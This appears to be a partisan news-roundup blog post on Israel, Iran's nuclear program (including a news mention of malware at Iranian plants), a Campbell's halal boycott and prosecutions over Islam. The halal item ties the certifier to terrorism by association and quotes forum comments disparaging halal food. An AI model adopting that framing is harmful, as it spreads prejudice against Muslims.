OUR ISRAELI CONNECTION

Isrelate.com reports
Hamas claimed on Thursday that it has uncovered an Israeli plot to locate kidnapped IDF soldier Gilad Schalit and extricate him by using a well-placed mole inside the Islamist terror militia who was planting bugs in the organization’s radios and cell phones. Israel reportedly spirited the agent out once he was discovered, according to a report in Egypt’s al-Ahram newspaper today. Hamas sources also said that the collaborator maintained relationships with top Hamas members in order to learn information about where Schalit is being held. The Hamas sources said that once they realized that an Israeli agent had supplied them with their wireless phones, they quickly stopped using them.

Joel Rosenberg reports
In May 2007, CBS News reported that “intelligence operatives…have sold Iran [nuclear] components with flaws that are difficult to detect, making them unstable or unusable.” Noted Mark Fitzpatrick, the former Deputy Assistant Secretary of State for Non-Proliferation and now Senior Fellow in Non-Proliferation at the International Institute for Strategic Studies, “Industrial sabotage is a way to stop the program, without military action, without fingerprints on the operation, and really, it is ideal, if it works. One way to sabotage a program is to make minor modifications in some of the components Iran obtains on the black market. The latest development is a mysterious and highly  aggressive “malware” virus of unknown origin that is suddenly plaguing computer systems at nuclear facilities and other  industrial plants throughout the Islamic Republic. The effect appears to be so severe that Iran had to announce at least a two month delay is the launch of on-line operations at its Bushehr Reactor that the Russians helped build.

A senior Israeli government official last week told me [Rosenberg] that Prime Minister Netanyahu will assess the effectiveness of international economic sanctions on Iran in December and January. “Decisions will have to made after that,” he said. What kind of decisions? The official wasn’t particularly optimistic that sanctions would work, but when pressed wouldn’t say what Netanyahu might do next. Still, the implication was fairly clear: If Iran’s nuclear weapons program is not severely hampered enough by the first of the new year — by a combination of diplomacy, international sanctions, and/or covert actions inside Iran — Netanyahu and his government feel they have no choice but to launch preemptive military strikes against Iran’s nuclear facilities.

There are early indications that sanctions are driving up prices inside Iran and causing political unrest. Meanwhile, some Western governments appear to be stepping up an aggressive covert war to sabotage Iran’s nuclear program. Now, Moscow has announced a big surprise for Iran — it has cancelled the sale to Iran its state-of-the-art S-300 anti-aircraft missile system. In fact, the Russian company that builds the missile system says it’s going to refund about $166 million which Iran has already paid. The reason for the cancellation is the new U.N. economic sanctions which were imposed on Iran.

IT’S NEWS TO ME

Vision to America reports
The Canadian division of the Campbell’s Soup company, known to generations for its “M’mmm, m’mmm, good” slogan, is selling products approved as “halal” for Muslims  by an organization with ties to the Muslim Brotherhood, the massive movement that has spawned terrorist organizations such as al-Qaida and Hamas. The move has triggered a Facebook-based boycott plan and the outrage of a multitude of online forum participants, including Kenny Solomon who cryptically wrote: “Stock … Sold as of the opening bell tomorrow. Letter .. Mailed about ten minutes ago. Items in my kitchen … In the garbage. I won’t even donate it.”

Added “Left Coast Conservative,” on Robert Spencer’s JihadWatch website, “Will not buy their products any more. Can’t imagine eating halal slaughtered food that has been offered to or ‘blessed by’ a foreign God – makes my stomach turn. This is wrong on so many levels.”

Worthy Christian News reports
An Algerian court acquitted two Christians of breaking the Ramadan fast despite the prosecution’s demand that they be punished for “insulting Islam.”

Associated Press reports
An Iranian news website says a court has sentenced a well-known Canadian-Iranian blogger to more than 19 years in prison. The conservative website, Mashreghnews.ir, which is close to Iran’s presidential office, says Hossein Derakhshan was convicted on charges of cooperation with hostile countries, spreading propaganda against the ruling establishment, promotion of counterrevolutionary groups and insulting Islamic thoughts and religious figures. The report says Derakhshan can appeal. Derakhshan, who made trips to Israel and blogged in both English and Farsi, has been in prison since 2008. It’s unclear if he would benefit from time served. Iranian authorities have arrested numerous bloggers in recent years in a bid to clamp down on Internet dissent.
